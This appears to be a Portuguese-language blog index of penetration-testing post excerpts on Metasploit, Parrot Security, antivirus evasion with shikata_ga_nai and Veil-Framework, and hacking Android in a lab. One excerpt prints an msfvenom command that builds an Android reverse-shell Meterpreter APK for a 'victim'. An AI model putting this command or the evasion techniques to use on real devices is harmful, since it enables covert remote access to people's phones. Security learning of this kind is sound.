Metasploit

Veil-Framework

Em Posts anteriores (este, este, este e este, por exemplo) mostrei como usar o msfvenom veil_logopara gerar várias cargas úteis, mas hoje em dia os fornecedores de AV codificaram os modelos de assinaturas que esses esquemas usam para que sejam ignorados pelos AV, então mostrei o uso de encoders, especialmente o shikata_ga_nai, para evitar que estes payloads sejam detectados como maliciosos pelos AntiVirus. O nome é apropriado (é a maneira japonesa de dizer “nada a ser feito sobre isso“), pois a codificação polimórfica significa que não há esperança de que os produtos antivírus detectem códigos maliciosos codificados usando esse método.

Não digo isso como uma verdade absoluta, pois agora os AVs podem simplesmente procurar pelo decodificador. Mas não tenho dúvidas que a identificação do malware será dificultada.

No post mencionado por último mostrei como criar um RAT (Remote Access Toolkit) usando o msfvenom e o Meterpreter. Quando criei esse RAT, usei o codificador Metasploit Shikata_ga_nai com o propósito de ignorar a proteção antivírus no sistema operacional Windows. Devido à popularidade, a maioria das soluções de antivírus registrou a assinatura do Shikata em seus bancos de dados. Isso resultou no Shikata sendo detectado e interrompido imediatamente por vários dos AVs. Porém, um hacker pode usar o Veil-Framework para contornar isso. Continue lendo!

Anúncios

Payloads e Encoders: Exploits para Serviços de Rede com o Parrot Security

Dando sequência aos dois últimos posts, e continuando com o Parrot Sec, chegou a hora de abordar o uso dos Payloads e Encoders.

Eu já mostrei como usar o Meterpreter de forma básica no post COMO HACKEAR O ANDROID USANDO METASPLOITS; agora vou mais fundo…. Continue lendo!

Módulos auxiliares do Metasploit com o Parrot Security

Continuando a minha aventura com o ParrotSec começada no post anterior – e permanecendo com a utilização do Metasploit framework, por ser minha ferramenta predileta para testes de penetração – neste post estou compartilhando as minhas anotações sobre o uso dos módulos auxiliares (auxiliary modules) da referida ferramenta. Continue lendo!

Metasploit e SMB com o Parrot OS

Arara_ini_leftPara variar, resolvi deixar o Kali Linux um pouco de lado e investir em outros OSs dedicados a testes de penetração. Hoje em dia, existem muitas opções: Kali Linux, BackTrack, Parrot OS, Backbox, BugTraq, Cyborg Hawk, CAINE… Me decidi pelo Parrot Security OS ou ParrotSec, para os íntimos.

Baixei a .iso do Parrot Security (Full) em https://www.parrotsec.org/download-full.fx , instalei no VmWare e fui à luta para sentir o drama; brinquei por uns dias com o básico do pen-testing, exploits, shell-code, reverse shells e coisas relacionadas. As minhas anotações nesta aventura resultaram neste post.

Abri um terminal e executei msfconsole-start. Continue lendo!

INVADINDO ANDROID COM METASPLOIT – O RETORNO

O Metasploit é uma ferramenta usada para investigar vulnerabilidades em plataformas, servidores e em sistemas operacionais, com ele é possível realizar testes de invasão (pentests) criando um ambiente de exploração de vulnerabilidades. Quando uma vulnerabilidade é descoberta pode-se desenvolver um exploit, aplicando técnicas de engenharia reversa ou programação. O exploit é executado e testado em vários cenários, provando a existência de vulnerabilidades. Continue lendo!

COMO HACKEAR O ANDROID USANDO METASPLOITS

Eu já abordei o uso de Metasploits em KALI LINUX , portanto, para um melhor entendimento, recomendo a leitura desse post; pois não serei repetitivo.

OBSERVAÇÃO:

O procedimento a seguir, foi executado em laboratório, este post é para fins educativos. Por favor, não invada a privacidade de ninguém sem permissão.

REQUISITOS:

– Kali Linux instalado em uma máquina virtual

– A VÍTIMA DEVE ESTAR NA MESMA REDE DE WIFI.

COMO HACKEAR O ANDROID USANDO METASPLOITS

  1. Abri o terminal do Kali Linux e escrevi o seguinte comando:

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 R > andro.apk Continue lendo!

Metasploit

Hackear pode ser perigoso para você mesmo. Seja cuidadoso e pratique no seu “laboratório” para aperfeiçoar suas habilidades sem colocar em risco os seus próprios sistemas. Basicamente, um laboratório de hackers consiste em várias máquinas virtuais em um único computador (e vários sistemas operacionais). Se você faz uma merda, você pode apenas reiniciar a máquina virtual e não haverá danos permanentes.

Existem muitos programas de máquinas virtuais por aí. Os mais populares são QEMU (desenvolvido para sistemas Linux), VMware (para computadores Linux e Windows), e VirtualBox (compatível com Linux, Mac ou Windows). Estes programas estão disponíveis gratuitamente. Considero o VirtualBox a sua melhor opção.

Depois de instalar uma máquina virtual, é preciso instalar um ou mais sistemas operacionais nela. Os sistemas modernos têm defesas excelentes, logo os novatos devem focar nos antigos, começando com Windows XP e Metasploitable.

O Windows XP tem muitas vulnerabilidades bem conhecidas. Pode ser um excelente alvo para praticar; hackear este sistema operacional com Metasploit é um passeio no parque.

O Metasploitable, por outro lado, é um sistema baseado em Linux especialmente criado para hackear, ele já contém ferramentas para treinamento de segurança, testes de segurança e para praticar técnicas comuns de teste de penetração (Pentest).

Continue lendo!